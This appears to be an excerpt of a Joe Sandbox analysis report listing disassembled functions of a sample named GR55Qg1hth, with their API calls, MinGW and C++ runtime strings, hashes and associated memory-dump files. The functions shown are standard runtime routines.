Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: d9646d0238463f4a9fa5e8536c7e4f2a0cb3db8ca23900b6fa539d3a08d83e95
Instruction ID: 557c70538f61f29bc41b3eab79ad69b201245cd66052c63fbc410f1e88ef1247
Opcode Fuzzy Hash: d9646d0238463f4a9fa5e8536c7e4f2a0cb3db8ca23900b6fa539d3a08d83e95
Instruction Fuzzy Hash: 7971D173F09E93B1EA60DF15C6041B96A50AB41B94F9D8132DA9EAB7D4EF3CE941C300

Function 00007FF65024ABD0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF65024AC75
memcpy.MSVCRT ref: 00007FF65024ACA0
memcpy.MSVCRT ref: 00007FF65024AD09
memcpy.MSVCRT ref: 00007FF65024AD3D
memcpy.MSVCRT ref: 00007FF65024AD89

Strings

basic_string::_M_replace, xrefs: 00007FF65024AE91

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: c3a0455e73a6db42963485fd6a8659049703a07be9359cd056d27bd1499a8b29
Instruction ID: 44e0d69512dbc24c5d751cf1bfbdc0c44ef7fbf4a7249956a5474aa7180b6d33
Opcode Fuzzy Hash: c3a0455e73a6db42963485fd6a8659049703a07be9359cd056d27bd1499a8b29
Instruction Fuzzy Hash: 0861E372E0D6DBB6FA619A25C2042B96E545F46BD0F4C8132DEAEAB7C2CD2CE541C300

Function 00007FF650247730 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 177COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF650247777
memcpy.MSVCRT ref: 00007FF650247969

Part of subcall function 00007FF650248330: memcpy.MSVCRT ref: 00007FF6502483AB

Strings

basic_string::insert, xrefs: 00007FF650247A53, 00007FF650247A62
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF650247A69
basic_string::_M_replace_aux, xrefs: 00007FF65024779F

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy$memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 438689982-1339558951
Opcode ID: 172abb4785d50f9bb8fc1aa41fe4772fd21efb9bcd329a97ec77ad43b2a038ce
Instruction ID: 1cd205fca66038c9792160966c66479db334131c3d973c2b9b24633e302188d9
Opcode Fuzzy Hash: 172abb4785d50f9bb8fc1aa41fe4772fd21efb9bcd329a97ec77ad43b2a038ce
Instruction Fuzzy Hash: 6651D372B0969770FA15AA6A97044BC6E506F05FD4F9C8632DEACB77C2DD2CE582C300

Function 00007FF650238960 Relevance: 13.6, APIs: 9, Instructions: 81COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00007FF65023898C
CreateSemaphoreA.KERNEL32 ref: 00007FF6502389CC
CreateSemaphoreA.KERNEL32 ref: 00007FF6502389E3
InitializeCriticalSection.KERNEL32(?,00007FF65047F400,00000000,00007FF650237957,?,?,?,00007FF650237A85,?,?,?,?,00007FF650237C25,?,00007FF65047F400), ref: 00007FF650238A0B
InitializeCriticalSection.KERNEL32(?,00007FF65047F400,00000000,00007FF650237957,?,?,?,00007FF650237A85,?,?,?,?,00007FF650237C25,?,00007FF65047F400), ref: 00007FF650238A12
InitializeCriticalSection.KERNEL32(?,00007FF65047F400,00000000,00007FF650237957,?,?,?,00007FF650237A85,?,?,?,?,00007FF650237C25,?,00007FF65047F400), ref: 00007FF650238A19

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphore$calloc
String ID:
API String ID: 2075313795-0
Opcode ID: 7e8303ed225199ebc012d561e86e84a94145ac8e4b9664a0c8037eb66d23b2a4
Instruction ID: 9ccbc9acfc30868606aaf262ac8915c0bbbabb611167fb5538aced076a61b459
Opcode Fuzzy Hash: 7e8303ed225199ebc012d561e86e84a94145ac8e4b9664a0c8037eb66d23b2a4
Instruction Fuzzy Hash: B121D032B15713A5FB59DB25E818BBA2A94EF48794F094436CE1D9BBC0EE3CD881C300

Function 000001B630F69944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001B630F699A1

Part of subcall function 000001B630F6A814: __GetUnwindTryBlock.LIBCMT ref: 000001B630F6A857
Part of subcall function 000001B630F6A814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001B630F6A87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001B630F69A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001B630F69CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 000001B630F69DDA

Strings

csm, xrefs: 000001B630F699BB
csm, xrefs: 000001B630F69A9C
csm, xrefs: 000001B630F69A22

Memory Dump Source

Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: 6bb64d160886c53119ccf66c4da09a0626b3acfccc6e44126f107c387aa1d703
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: 4AE1907260874886EB60DF65D480BDDB7E4F769B98F100219EE8D57BA9CB3EC499C700

Function 00007FF65022E410 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF65022E529

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF65022E5C1
Mingw-w64 runtime failure:, xrefs: 00007FF65022E448
VirtualProtect failed with code 0x%x, xrefs: 00007FF65022E59E
Address %p has no image-section, xrefs: 00007FF65022E480, 00007FF65022E5D5

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: e3e33f510ec569f18424812ecf334348979b1e94ec05e85f37b42736d06bb633
Instruction ID: cd8da59ca120bd8a5a9d9b7229cd3552e183052476989ec06c63a2e1f35dbfc8
Opcode Fuzzy Hash: e3e33f510ec569f18424812ecf334348979b1e94ec05e85f37b42736d06bb633
Instruction Fuzzy Hash: C351C072A18A43E1EB109F51E8416B97BA0FF85B98F4C8134DE4CA7395EE3CE456C740

Function 00007FF65023CAF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122COMMON

Download Yara Rule

Strings

%.*s, xrefs: 00007FF65023CC78
%-*.*s, xrefs: 00007FF65023CC86
%*.*s, xrefs: 00007FF65023CC35

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: %*.*s$%-*.*s$%.*s
API String ID: 0-4054516066
Opcode ID: 8021c32a5ab65d8367e2dd4e401afee6a582ac1b3f5481d56cebd02881bf996d
Instruction ID: c596ef2fd915f633422fc514ca47a5f3d47bfe683bc8c1ce9297faaa61984474
Opcode Fuzzy Hash: 8021c32a5ab65d8367e2dd4e401afee6a582ac1b3f5481d56cebd02881bf996d
Instruction Fuzzy Hash: 295179B2A1825396E7608F25C6417B9BBA1EB48F98F3CD135DA4CD7799CE3DE8008740

Function 00007FF65023C6C0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 110COMMON

Download Yara Rule

Strings

%-*.*S, xrefs: 00007FF65023C836
%.*S, xrefs: 00007FF65023C828
%*.*S, xrefs: 00007FF65023C7FD

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: %*.*S$%-*.*S$%.*S
API String ID: 0-2115465065
Opcode ID: 011fee9095203b1fa813b7e73a1d16fb68cbd301c1640dc573de5faab9d2e5eb
Instruction ID: 44a67dc01f568a5348f420e6f19922424c3db237ec07043932b69a9c0c80b42f
Opcode Fuzzy Hash: 011fee9095203b1fa813b7e73a1d16fb68cbd301c1640dc573de5faab9d2e5eb
Instruction Fuzzy Hash: DD41E473B18643A5F7509A25D5046B8AA95EF88BA4F7CC131DE4CD7789DF3CE4418B10

Function 00007FF650244370 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 215stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF650244399
memcmp.MSVCRT ref: 00007FF6502443B8
memcmp.MSVCRT ref: 00007FF650244446
memcmp.MSVCRT ref: 00007FF6502444C8

Part of subcall function 00007FF650251000: strlen.MSVCRT ref: 00007FF65025101E

memcmp.MSVCRT ref: 00007FF650244574

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6502443F9, 00007FF650244483, 00007FF650244505, 00007FF6502445B1, 00007FF6502445CA
basic_string::compare, xrefs: 00007FF6502443F2, 00007FF65024447C, 00007FF6502444FE, 00007FF6502445AA, 00007FF6502445C3

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: a672230a2770c696c69fcdeeefd17ed37b61ff551e018dffba0a57b831f28931
Instruction ID: 3b20589feb189b5704dd8f753199f84a555e10b8517102bbb41cc749bbcab137
Opcode Fuzzy Hash: a672230a2770c696c69fcdeeefd17ed37b61ff551e018dffba0a57b831f28931
Instruction Fuzzy Hash: 7851D6B2F05987B1FE109A26DE402E866809F15FE4F9C4231EE6CA77D5FD1CE9868300

Function 00007FF650245420 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 202stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF650245449
memcmp.MSVCRT ref: 00007FF65024546A
memcmp.MSVCRT ref: 00007FF6502454F6
memcmp.MSVCRT ref: 00007FF650245575

Part of subcall function 00007FF650251000: strlen.MSVCRT ref: 00007FF65025101E

memcmp.MSVCRT ref: 00007FF650245611

Strings

basic_string::compare, xrefs: 00007FF6502454A4, 00007FF65024552C, 00007FF6502455AB, 00007FF650245647, 00007FF650245660
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6502454AB, 00007FF650245533, 00007FF6502455B2, 00007FF65024564E, 00007FF650245667

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 9399586e5fb662dc3eeb57c01141c6110a813195edc18db79982ee2d928975da
Instruction ID: 0648e74374742967255c4dc9067f8323000cc25034af3ca4136e8b095f0f4b81
Opcode Fuzzy Hash: 9399586e5fb662dc3eeb57c01141c6110a813195edc18db79982ee2d928975da
Instruction Fuzzy Hash: 4651D8B2B09597B1FE109A26DE002F457819F05BE4F5C4235EE6CE77D6ED5CE9868300

Function 00007FF65024D380 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182COMMON

Download Yara Rule

Strings

basic_string::basic_string, xrefs: 00007FF65024D4EE, 00007FF65024D548
basic_string::_M_create, xrefs: 00007FF65024D41E, 00007FF65024D4B2
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF65024D4F5, 00007FF65024D54F, 00007FF65024D59F
basic_string::_M_construct null not valid, xrefs: 00007FF65024D412
string::string, xrefs: 00007FF65024D598

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-4165567116
Opcode ID: 5fd983c037f3ecb858841f5b63359419f2ee617f3b682fd2cd8ec1173b2a215b
Instruction ID: 3c4bc855094e27a6a180a7938412d8307674f3587b2bb0720ce89023231f3fb1
Opcode Fuzzy Hash: 5fd983c037f3ecb858841f5b63359419f2ee617f3b682fd2cd8ec1173b2a215b
Instruction Fuzzy Hash: 9B51C6B2B05B43B0EB10AF25D5401A86B64FB14F94B9C4632DAACA7795EF3CE596C301

Function 00007FF65024CDD0 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182COMMON

Download Yara Rule

Strings

basic_string::basic_string, xrefs: 00007FF65024CF3E, 00007FF65024CF98
basic_string::_M_create, xrefs: 00007FF65024CE6E, 00007FF65024CF02
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF65024CF45, 00007FF65024CF9F, 00007FF65024CFEF
basic_string::_M_construct null not valid, xrefs: 00007FF65024CE62
string::string, xrefs: 00007FF65024CFE8

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-4165567116
Opcode ID: 2e7d8bc6db8043a146ff6947aafe9d6adb3b3bb0a7f6c8011dadfe895f5f87fa
Instruction ID: 4e29d29433d8a28c942a62ccdfc4834f6fc6a34bba6a13e34e5aa6b8eeeb3ce0
Opcode Fuzzy Hash: 2e7d8bc6db8043a146ff6947aafe9d6adb3b3bb0a7f6c8011dadfe895f5f87fa
Instruction Fuzzy Hash: 0651C6B2B05B43B0EB50AF25D4401A967A0FB18F94B9C4632DAACA77D5EF3CD596C300

Function 00007FF650235320 Relevance: 10.6, APIs: 7, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF650232B00: TlsGetValue.KERNEL32 ref: 00007FF650232B60

TlsGetValue.KERNEL32 ref: 00007FF650235379
CloseHandle.KERNEL32 ref: 00007FF6502353A5
_endthreadex.MSVCRT ref: 00007FF6502353C3
longjmp.MSVCRT ref: 00007FF6502353F4
CloseHandle.KERNEL32 ref: 00007FF650235405
TlsSetValue.KERNEL32 ref: 00007FF650235442
CloseHandle.KERNEL32 ref: 00007FF65023545A

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CloseHandleValue$_endthreadexlongjmp
String ID:
API String ID: 3990644698-0
Opcode ID: 64af44273f167c6ad877b66a8271b90c8828086299775b24d211343f9edc84f1
Instruction ID: 8dd1f0eae0e56281de792a43c6f94909857bcfd6812f080670cc12abc420eb07
Opcode Fuzzy Hash: 64af44273f167c6ad877b66a8271b90c8828086299775b24d211343f9edc84f1
Instruction Fuzzy Hash: 6A510836A19B13A5FB999B11D5483B93AA4FF48B8AF4D4079CA0DA3391DF7CE484C341

Function 00007FF650237670 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

., xrefs: 00007FF650237774
Assertion failed: (%s), file %s, line %d, xrefs: 00007FF65023778D
C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 00007FF65023777C
